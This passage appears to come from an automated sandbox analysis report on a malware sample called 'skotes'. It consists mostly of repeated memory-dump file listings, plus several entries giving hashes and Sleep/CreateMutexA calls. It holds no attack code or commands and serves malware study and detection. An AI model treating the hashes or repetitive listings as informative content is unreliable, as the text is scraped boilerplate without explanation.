Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: d6262d222555445bc03c4001ce67e73d9d92f29d16d1cd85ca1d9147953a6ce8
Instruction ID: 9c90fc09ac75b9b056fca6424ae09d79716d4884638f4041b20c0852b7275c92
Opcode Fuzzy Hash: d6262d222555445bc03c4001ce67e73d9d92f29d16d1cd85ca1d9147953a6ce8
Instruction Fuzzy Hash: 66315B31A092008BFB08EB7CDD89B6DBB62EBC1334F244218E454E73D5C7B99A81A751

Function 00F39F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 5ce312f1b096eff84262ccf66c905c644e355b0d4a02de69748edba3d3ade8b7
Instruction ID: 1e37f5d41c6858fa18f34a18de660850287dd85d26436b9d8672458a9d1c0324
Opcode Fuzzy Hash: 5ce312f1b096eff84262ccf66c905c644e355b0d4a02de69748edba3d3ade8b7
Instruction Fuzzy Hash: 9C315931A041048BFB08AB7CDC847ADBB62EBC5334F204619E458E73D5D7BA9980A762

Function 00F3A079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: f7524893ce42cdb72e930675cd0dfb67a60017e91819978731d2347a847cf868
Instruction ID: 976e8710a072d42ac7f7d1df4a07340c6d8aebe28b4b3e51a334cfb699f7edee
Opcode Fuzzy Hash: f7524893ce42cdb72e930675cd0dfb67a60017e91819978731d2347a847cf868
Instruction Fuzzy Hash: D3315971B001009BEB18EB7DCD85B6DBB62DF82334F204619E494E77E1C77A9980AB12

Function 00F3A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 26bc07904c635b3dc55d307a4d376847d031ed23ca055892a0c349fb7b7361ed
Instruction ID: 6418e7d9e5f6424bc79cf5c963e08245a0d4e3c53036e026d2e1bece4a8438d1
Opcode Fuzzy Hash: 26bc07904c635b3dc55d307a4d376847d031ed23ca055892a0c349fb7b7361ed
Instruction Fuzzy Hash: E6314831A011009BFB08AB7DDD89B6EBB62AB86330F204619E454E73D1D77A9980A712

Function 00F3A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f30000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 791168284ab8bdffd905ea26b3930bd0ed53a5c0c11a03c699392ff00d7817f8
Instruction ID: c27499aae65d49bd100cc4a46b8810fa71bf84f888e8d06f4786f3e69a74a666
Opcode Fuzzy Hash: 791168284ab8bdffd905ea26b3930bd0ed53a5c0c11a03c699392ff00d7817f8
Instruction Fuzzy Hash: C2315B31A041009BEB08EB7CDD89B6DB762EFC1334F244618E494EB3E5D77999C0A762

Function 00F3A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00F3A963
CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981

Memory Dump Source

Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true

Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
